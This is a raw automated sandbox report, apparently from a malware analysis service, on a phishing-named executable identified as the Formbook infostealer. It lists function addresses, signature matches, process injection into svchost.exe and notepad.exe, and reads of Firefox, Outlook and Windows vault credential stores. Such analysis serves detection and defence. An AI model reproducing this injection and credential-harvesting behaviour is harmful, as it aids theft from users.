            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBF43F6_2_04CBF43F
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CC95C36_2_04CC95C3
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C9D5B06_2_04C9D5B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB75716_2_04CB7571
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB16CC6_2_04CB16CC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C456306_2_04C45630
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBF7B06_2_04CBF7B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C070C06_2_04C070C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CAF0CC6_2_04CAF0CC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB70E96_2_04CB70E9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBF0E06_2_04CBF0E0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C0B1B06_2_04C0B1B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CCB16B6_2_04CCB16B
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C3516C6_2_04C3516C
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BEF1726_2_04BEF172
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C1B2C06_2_04C1B2C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CA12ED6_2_04CA12ED
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C1D2F06_2_04C1D2F0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C052A06_2_04C052A0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C4739A6_2_04C4739A
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB132D6_2_04CB132D
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BED34C6_2_04BED34C
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBFCF26_2_04CBFCF2
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C79C326_2_04C79C32
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C1FDC06_2_04C1FDC0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C03D406_2_04C03D40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB1D5A6_2_04CB1D5A
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB7D736_2_04CB7D73
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C09EB06_2_04C09EB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C01F926_2_04C01F92
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BC3FD56_2_04BC3FD5
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BC3FD26_2_04BC3FD2
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBFFB16_2_04CBFFB1
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBFF096_2_04CBFF09
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C038E06_2_04C038E0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C6D8006_2_04C6D800
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C099506_2_04C09950
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C1B9506_2_04C1B950
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C959106_2_04C95910
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CADAC66_2_04CADAC6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C45AA06_2_04C45AA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C9DAAC6_2_04C9DAAC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CA1AA36_2_04CA1AA3
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBFA496_2_04CBFA49
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB7A466_2_04CB7A46
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C73A6C6_2_04C73A6C
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C75BF06_2_04C75BF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C3DBF96_2_04C3DBF9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C1FB806_2_04C1FB80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBFB766_2_04CBFB76
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029A1C106_2_029A1C10
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_0299CB206_2_0299CB20
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_0299ADC06_2_0299ADC0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_0299CD406_2_0299CD40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029A52B06_2_029A52B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029A34A06_2_029A34A0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029BB9506_2_029BB950
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04A1E4676_2_04A1E467
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04A1E7FC6_2_04A1E7FC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04A1E3466_2_04A1E346
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04A1D8686_2_04A1D868
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04A1CB086_2_04A1CB08
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04C7F290 appears 102 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04C35130 appears 58 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04BEB970 appears 262 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04C47E54 appears 107 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04C6EA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0312B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03175130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031AEA12 appears 86 times
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: String function: 0004F9F2 appears 31 times
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: String function: 00050A30 appears 46 times
            Source: URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1791214385.00000000046BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs URGENT REQUEST FOR QUOTATION.exe
            Source: URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1793034267.0000000004513000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs URGENT REQUEST FOR QUOTATION.exe
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2075405334.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4128947956.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4128861229.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2075121033.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4128488023.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2075735813.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/8
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A37B5 GetLastError,FormatMessageW,0_2_000A37B5
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000910BF AdjustTokenPrivileges,CloseHandle,0_2_000910BF
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000916C3
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_000A51CD
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_000BA67C
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_000A648E
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000342A2
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\craniadJump to behavior
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: notepad.exe, 00000006.00000003.2313226378.0000000003030000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4129028971.0000000003051000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000003.2313226378.0000000003051000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: URGENT REQUEST FOR QUOTATION.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe"
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe"
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeProcess created: C:\Windows\SysWOW64\notepad.exe "C:\Windows\SysWOW64\notepad.exe"
            Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe"Jump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeProcess created: C:\Windows\SysWOW64\notepad.exe "C:\Windows\SysWOW64\notepad.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: URGENT REQUEST FOR QUOTATION.exeStatic file information: File size 1594368 > 1048576
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: notepad.pdbGCTL source: svchost.exe, 00000001.00000003.2043645344.0000000002A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2043561266.0000000002A2B000.00000004.00000020.00020000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000005.00000002.4128908915.0000000000E07000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: notepad.pdb source: svchost.exe, 00000001.00000003.2043645344.0000000002A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2043561266.0000000002A2B000.00000004.00000020.00020000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000005.00000002.4128908915.0000000000E07000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iadfuWOlEqeEML.exe, 00000005.00000000.1997263361.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp, iadfuWOlEqeEML.exe, 00000008.00000000.2149531775.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1791927284.0000000004590000.00000004.00001000.00020000.00000000.sdmp, URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1791106114.00000000043F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1983828950.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2075430736.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1985268186.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2075430736.0000000003100000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130032085.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130032085.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000003.2084217332.0000000004A10000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000003.2082299501.0000000004868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1791927284.0000000004590000.00000004.00001000.00020000.00000000.sdmp, URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1791106114.00000000043F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1983828950.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2075430736.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1985268186.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2075430736.0000000003100000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, notepad.exe, 00000006.00000002.4130032085.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130032085.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000003.2084217332.0000000004A10000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000003.2082299501.0000000004868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: notepad.exe, 00000006.00000002.4129028971.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130391348.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.0000000002D8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2425494777.000000000770C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: notepad.exe, 00000006.00000002.4129028971.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130391348.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.0000000002D8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2425494777.000000000770C000.00000004.80000000.00040000.00000000.sdmp
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00050A76 push ecx; ret 0_2_00050A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D0A4 push 0000000Dh; iretd 1_2_0041D0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041491A push edx; ret 1_2_00414954
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AAEC push ecx; iretd 1_2_0040AAED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413BE3 push eax; retf 1_2_00413BE4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EBA3 push esp; iretd 1_2_0041EBDC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040ABA5 push edx; retf 1_2_0040ABA9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403430 push eax; ret 1_2_00403432
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D43B push es; retf 1_2_0040D455
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401CE0 push ds; iretd 1_2_00401DEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004015DF push 00000028h; ret 1_2_004015F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004085F8 push eax; ret 1_2_00408602
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416643 pushfd ; iretd 1_2_00416658
